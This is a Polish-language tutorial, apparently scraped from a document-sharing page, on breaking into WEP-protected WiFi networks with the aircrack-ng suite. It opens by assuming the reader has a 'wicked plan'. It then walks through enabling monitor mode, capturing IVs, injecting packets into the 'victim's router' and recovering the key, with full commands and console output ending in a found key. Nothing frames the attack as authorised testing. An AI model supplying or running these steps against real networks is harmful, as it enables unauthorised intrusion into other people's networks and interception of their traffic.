[WiFi] – WEP Cracking

background image

[

WiFi] – WEP Cracking

Skoro już trafiłeś na tę stronę to pewnie masz jakiś niecny plan.
To zobacz, jak łatwo jest włamać się do sieci
WiFi

zabezpieczanej przez WEP.

Zgaduję, że zamierzasz włamać się do sieci WiFi (czyt. łaj-faj),
zabezpieczonej protokołem z kluczem WEP, ale nie masz zielonego pojęcia
jak się do tego zabrać.
Co musisz mieć przygotowane:

Linux

aircrack-ng

karta WiFi
Przejdź na konto root.

Wpisz w konsoli:

airmon-ng start <interface>

Gdzie <inf> to interface sieciowy Twojej karty WLAN. U mnie to wygląda
tak:

#

airmon-ng start wlan0

Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of

time, you may want to

kill

(

some of

)

them!

PID Name

1336

avahi-daemon

1337

avahi-daemon

1342

NetworkManager

1457

wpa_supplicant

32353

dhclient

32426

dhclient

Process with PID 32353

(

dhclient

)

is running on interface wlan0

Process with PID 32426

(

dhclient

)

is running on interface wlan1

Interface Chipset Driver

wlan0 Atheros ath9k -

[

phy0

]

(

monitor mode enabled on mon0

)

wlan1 RTL8187 rtl8187 -

[

phy1

]

Ty pewnie będziesz miał coś innego na wyjściu po wykonaniu tej komendy,
ale nie przejmuj się.

background image

Z powyższego możesz odczytać, że

tryb monitor został włączony na

inferface mon0, co jest kluczowe do ataku. Sporo osób nie rozumie skąd
wziął się ten interface, nie w Twoim komputerze nie pojawiła się magicznie
nowa karta sieciowa, chociaż tak, właściwie to pojawiła się, ale jest
onawirtualna, utworzona jest na tym samym chipsecie, na którym jest
fizyczny interface.
Teraz co musisz zrobić? Wykorzystać ten wirtualny interface do
przechwycenia pakietów.
Można tego z łatwością dokonać za pomocą programu, który wchodzi w
skład pakietu

aircrack-ng, nazwya się on airodump-ng, służy do

przechwytywania każdego pakietu w eterze w zasięgu Twojej karty
sieciowej. Nie będę się tutaj zagłębiał w to jak działa program ani w jego
dokumentację. Musisz wiedzieć tylko co się stanie gdy wpiszesz

airodump-ng -t WEP -c 1 --ivs -w NASA_WEP

Otóż stanie się to:

program będzie działał na interface

mon0

będzie wyświetlał tylko te sieci, które są “zabezpieczone” przez

WEP

tylko te, które działają na

kanale 1

będzie zapisywał pakiety IVS

do pliku o nazwie NASA_WEP

Zostawiasz przechwytywanie na jakiś czas ma się zebrać duża liczba w
tabeli “#Data“, w niej zapisane są części klucza, który chcesz złamać, im
więcej ich masz tym szybciej złamiesz kluczyk.

No dobra, załóżmy że trochę ich już masz. Wejdź w drugą konsolę.
Program aircrack-ng służy do odzyskiwania hasła zapisanego w
przechwyconych pakietach. Musisz go odpalić wskazując mu gdzie jest plik
z przechwyconymi danymi, żeby mógł zacząć działać.

#

aircrack-ng NASA_WEP-01.ivs

Opening NASA_WEP-01.ivs
Read 1539 packets.

#

BSSID ESSID Encryption


1 00:04:

ED:A3:80:11 NASA WEP

(

1538 IVs

)

Choosing first network

as

target.

background image

Opening NASA_WEP-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1538 ivs.

Aircrack-ng 1.0

[

00:00:04

]

Tested 166831 keys

(

got 1538 IVs

)

KB depth byte

(

vote

)

0 29/ 30 97

(

2308

)

15

(

2304

)

D0

(

2304

)

BB

(

2272

)

4A

(

2232

)

4B

(

2232

)

1 8/ 12 95

(

2632

)

29

(

2600

)

8

E

(

2600

)

DE

(

2600

)

65

(

2564

)

7A

(

2564

)

2 12/ 2 19

(

2560

)

27

(

2488

)

A6

(

2488

)

BC

(

2488

)

2C

(

2452

)

51

(

2452

)

3 32/ 3

D7

(

2196

)

19

(

2192

)

56

(

2192

)

0D

(

2160

)

83

(

2160

)

CB

(

2160

)

4 9/ 10 61

(

2852

)

DA

(

2820

)

03

(

2816

)

55

(

2748

)

3A

(

2564

)

19

(

2560

)

Failed. Next try with 5000 IVs.

No niestety, minuta przechwytywania pakietów to za mało. Musisz jeszcze
chwilę poczekać.

Aircrack-ng 1.0

[

00:00:06

]

Tested 1409955 keys

(

got 5040 IVs

)

KB depth byte

(

vote

)

0 95/ 97

E2

(

5448

)

42

(

5412

)

5D

(

5380

)

03

(

5376

)

AA

(

5376

)

3E

(

5372

)

1 46/ 1 16

(

5960

)

09

(

5928

)

CB

(

5928

)

43

(

5924

)

55

(

5892

)

B0

(

5892

)

2 26/ 92

A0

(

6184

)

F6

(

6148

)

C1

(

6108

)

F3

(

6076

)

62

(

6072

)

E6

(

6068

)

3 38/ 3

E9

(

5996

)

D3

(

5960

)

D6

(

5960

)

F4

(

5928

)

2F

(

5924

)

C4

(

5924

)

4 2/ 8 51

(

7980

)

AA

(

7652

)

35

(

7212

)

E8

(

7132

)

37

(

7096

)

76

(

6916

)

Failed. Next try with 10000 IVs.

Nie udało się. Mam za mało danych potrzebnych do złamania klucza.
Trzeba pomóc airodumpowi żeby

szybciej chwytał te pakiety, można to

zrobić za pomocą

airepley-ng, służy on do wstrzykiwania pakietów do

określonego AP, w celu zebrania większej ilości pakietów z kluczem.

aireplay-ng -3 -b MAC_ADDR_AP mon0

Powyższym poleceniem zaczniesz wstrzykiwać pakiety do routera ofiary.
MAC_ADDR_AP weźmiesz z okienka airodump’a, jest to adres MAC
docelowej sieci.
Różne poradniki sugerują różne wymagane ilości danych potrzebnych do
złamania klucza. Jednak jest to zależne od sieci. Co chwilę można przecież
sprawdzać postęp w pracy, nie czekając do tych 20/k/35k/50k IVsów.
Po kilku minutach aircrac-ng zostaje odpalony ponownie, oto efekt jego
działania:

#

aircrack-ng NASA_WEP-01.ivs

Opening NASA_WEP-01.ivs
Read 22707 packets.

#

BSSID ESSID Encryption

background image


1 00:04:

ED:A3:80:11 NASA WEP

(

22706 IVs

)

Choosing first network

as

target.

Opening NASA_WEP-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 22706 ivs.

Aircrack-ng 1.0

[

00:02:23

]

Tested 15634 keys

(

got 25939 IVs

)

KB depth byte

(

vote

)

0 10/ 12 68

(

31464

)

97

(

31460

)

3

C

(

31424

)

6A

(

31336

)

1B

(

31232

)

17

(

31136

)

1 3/ 12 61

(

32960

)

F1

(

32852

)

58

(

32736

)

BB

(

32480

)

37

(

32448

)

31

(

32440

)

2 1/ 5 78

(

37040

)

EE

(

34204

)

32

(

33476

)

92

(

33212

)

D5

(

32780

)

B1

(

31676

)

3 0/ 2 65

(

39072

)

54

(

34420

)

3

A

(

32792

)

71

(

32560

)

BE

(

32492

)

D7

(

32188

)

4 9/ 11

AC

(

31544

)

0A

(

31452

)

C3

(

31288

)

80

(

31232

)

C5

(

31192

)

40

(

31032

)

KEY FOUND!

[

<strong>68:61:78:65:64</strong>

]

(

ASCII: haxed

)

Decrypted correctly: 100%

Jak widać kluczem do sieci jest: haxed.


Document Outline


Wyszukiwarka

Podobne podstrony:
[WiFi] – WEP Cracking
www haker com pl WEP Cracking WinXP t31806
Jak złamać WEP, WiFi
Cracking Wifi al Completo David Puente Castro
118 130 test wifi
Metody testowania zabezpieczen w sieciach WiFi 4TG WoDzUu
WiFi, Informatyka -all, INFORMATYKA-all
sprawozdanie wifi TUREK SZYMCZYK
Bezprzewodowa sieć WiFi
WiFi, Systemy Operacyjne i Sieci Komputerowe
ZMIANA ADRESU MAC KARTY WIFI WINDOWS VISTA XP 7, LINUX
Jak złamać WEP, ALIGATORNIA, HACKING
łamanie WEP
WiFi Slax Wireless Hacking Live? V 3 1 PEŁNE
030 Szelangiewicz crackid 4632 Nieznany (2)
budowa sieci wifi otw
BackTrack v Beini Hacking WiFi (The Easy Way)
Zabezpieczenia w sieci WiFi

więcej podobnych podstron